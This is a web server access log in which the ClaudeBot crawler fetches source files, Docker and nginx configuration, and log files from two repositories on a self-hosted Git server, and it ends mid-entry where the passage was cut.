git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh?display=rendered" [Client 216.73.216.188] [Length 10961] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md?display=rendered" [Client 216.73.216.188] [Length 13339] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 12756] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15597] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/App.tsx" [Client 216.73.216.188] [Length 12745] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" [Client 216.73.216.188] [Length 10602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 20146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" [Client 216.73.216.188] [Length 11148] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json?display=source" [Client 216.73.216.188] [Length 11039] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" [Client 216.73.216.188] [Length 14212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 216.73.216.188] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 31285] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12597] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log?display=source" [Client 216.73.216.188] [Length 11375] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 10146] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 27640] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 216.73.216.188] [Length 12745] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 10967] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?display=source" [Client 216.73.216.188] [Length 11091] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log?display=source" [Client 216.73.216.188] [Length 14478] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?display=source" [Client 216.73.216.188] [Length 11081] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 14401] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 216.73.216.188] [Length 11851] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 216.73.216.188] [Length 11304] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 216.73.216.188] [Length 11482] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" [Client 216.73.216.188] [Length 9918] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 216.73.216.188] [Length 11263] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" [Client 216.73.216.188] [Length 10133] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 216.73.216.188] [Length 11668] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" [Client 216.73.216.188] [Length 10562] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 216.73.216.188] [Length 10689] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile?display=source" [Client 216.73.216.188] [Length 11589] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html?display=rendered" [Client 216.73.216.188] [Length 14300] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log?display=source" [Client 216.73.216.188] [Length 19581] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log?display=source" [Client 216.73.216.188] [Length 12832] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 12179] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 216.73.216.188] [Length 11025] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11896] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 216.73.216.188] [Length 11187] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 216.73.216.188] [Length 47165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_error.log?display=rendered" [Client 216.73.216.188] [Length 10941] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 33619] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log?display=source" [Client 216.73.216.188] [Length 20556] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 35824] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 10134] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 33428] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 216.73.216.188] [Length 11021] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 216.73.216.188] [Length 10531] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf?display=source" [Client 216.73.216.188] [Length 11671] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 216.73.216.188] [Length 11885] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 2190] [Gzip 